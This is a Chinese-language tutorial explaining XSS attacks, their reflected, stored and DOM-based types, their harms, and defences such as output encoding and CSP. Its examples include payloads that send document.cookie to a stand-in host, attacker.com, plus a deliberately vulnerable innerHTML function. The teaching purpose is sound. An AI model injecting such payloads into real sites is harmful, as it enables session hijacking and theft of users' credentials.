一、什么是 XSS 跨脚本攻击（Cross - Site Scripting）

1. 定义

• XSS 是一种常见的网络安全漏洞，它允许攻击者将恶意脚本（通常是 JavaScript）注入到目标网站中。这些恶意脚本会在用户的浏览器中执行，从而使攻击者能够窃取用户的敏感信息，如登录凭证、个人数据，或者操纵用户的浏览器行为。

2. 原理

• 当目标网站没有对用户输入的数据进行充分的过滤和验证，或者没有正确地对输出内容进行编码时，攻击者就可以利用这些漏洞注入脚本。例如，一个简单的留言板功能，如果它直接将用户输入的留言内容显示在网页上而没有任何过滤，攻击者就可以在留言中插入恶意脚本。

• 以一个常见的场景为例，假设有一个搜索框，用户输入的关键词会在页面上显示 “您搜索的关键词是：[用户输入内容]”。如果没有过滤，攻击者输入 “<script>alert('XSS')</script>”，那么当页面显示这个搜索结果时，就会弹出一个警告框，这就证明了 XSS 攻击的可能性。

二、XSS 攻击的类型

1. 反射型 XSS（Reflected XSS）

• 工作方式：也叫非持久型 XSS。攻击者构造一个带有恶意脚本的 URL，诱使受害者点击这个链接。当受害者访问这个链接时，服务器会接收包含恶意脚本的请求，然后将这个脚本包含在响应中返回给受害者的浏览器，脚本在浏览器中执行。

• 示例：一个网站有一个根据用户输入的参数来显示错误信息的页面。攻击者构造一个链接，如 “https://example.com/error.php?message=<script>document.location = 'https://attacker.com/steal - info.php?data=' + document.cookie</script>”。当受害者点击这个链接，浏览器会向服务器请求这个页面，服务器会将包含恶意脚本的错误信息返回，然后脚本会执行，将用户的 cookie 信息发送到攻击者的服务器。

2. 存储型 XSS（Stored XSS）

• 工作方式：这是一种持久型的 XSS 攻击。攻击者将恶意脚本注入到目标网站的数据库或其他存储介质中。当用户正常访问包含被注入恶意脚本的页面时，脚本就会从存储介质中被读取并在浏览器中执行。

• 示例：在一个博客系统中，如果评论功能没有对评论内容进行过滤。攻击者在评论中插入恶意脚本 “<script>setInterval(function(){fetch('https://attacker.com/collect - data.php?data=' + document.cookie)}, 5000);</script>”。这条评论被存储在数据库中，之后任何访问该博客文章并加载评论的用户，其浏览器都会执行这个脚本，每隔 5 秒就会将用户的 cookie 信息发送到攻击者的服务器。

3. DOM - based XSS（基于 DOM 的 XSS）

• 工作方式：这种类型的 XSS 主要是利用了网页的文档对象模型（DOM）。恶意脚本通过修改 DOM 节点的内容来执行攻击，通常是通过操作 HTML5 中的本地存储、URL 参数等。与反射型和存储型 XSS 不同的是，DOM - based XSS 的脚本执行是在浏览器端，而不是服务器端返回包含恶意脚本的内容。

• 示例：假设有一个 JavaScript 函数，它根据 URL 中的参数来更新页面的内容，如下所示：

• function updateContent() {    var userInput = window.location.href.split("?")[1];    document.getElementById("content - area").innerHTML = userInput; }
  

如果攻击者构造一个 URL“https://example.com/page.html?<script>alert('XSS')</script>”，当用户访问这个 URL 并且浏览器执行updateContent函数时，就会导致脚本执行，弹出警告框。

• 三、XSS 攻击的危害

• 信息窃取

• 攻击者可以通过 XSS 获取用户的登录凭证（如用户名和密码）、个人信息（如姓名、地址、联系方式）、信用卡信息等。例如，在一个网上银行的网站遭受 XSS 攻击后，攻击者可以通过恶意脚本获取用户输入的银行账户登录信息，然后利用这些信息进行非法的资金转移等操作。

• 会话劫持

• 攻击者可以获取用户的会话 ID（如存储在浏览器 cookie 中的会话 ID），然后利用这个会话 ID 来冒充用户进行操作。这意味着攻击者可以在用户不知情的情况下，以用户的身份在网站上执行各种操作，如发送消息、修改设置等。

• 恶意操作

• 攻击者可以通过 XSS 控制用户的浏览器，进行恶意操作，如修改页面内容、自动点击广告、进行 DDoS（分布式拒绝服务）攻击的一部分（利用受害者的浏览器向其他目标发送大量请求）等。例如，攻击者可以通过 XSS 让受害者的浏览器自动访问大量的恶意网站，或者在社交媒体平台上自动发布垃圾内容。

• 四、防范 XSS 攻击的措施

• 输入验证和过滤

• 网站开发者应该对所有用户输入的数据进行严格的验证和过滤。例如，对于输入的文本，只允许特定的字符集和格式。如果用户输入的数据应该是纯文本（如评论内容），那么应该过滤掉任何 HTML 标签和脚本标签。可以使用正则表达式或者专门的输入验证库来实现这一点。

• 输出编码

• 当网站将数据输出到网页上时（如显示用户评论、搜索结果等），应该对数据进行合适的编码。例如，将特殊字符（如 “<”“>”“&” 等）转换为 HTML 实体编码。在 PHP 中，可以使用htmlspecialchars函数来对输出数据进行编码，这样即使数据中包含恶意脚本的片段，在浏览器中也会被当作普通文本显示，而不会被执行。

• 内容安全策略（CSP）

• CSP 是一种浏览器安全机制，它允许网站所有者定义哪些来源的脚本可以在浏览器中执行。通过设置合适的 CSP 头信息，网站可以限制恶意脚本的注入和执行。例如，一个网站可以设置 CSP 为只允许从自己的域名下加载脚本，这样即使攻击者成功注入了恶意脚本，浏览器也不会执行它，因为它来自非允许的来源。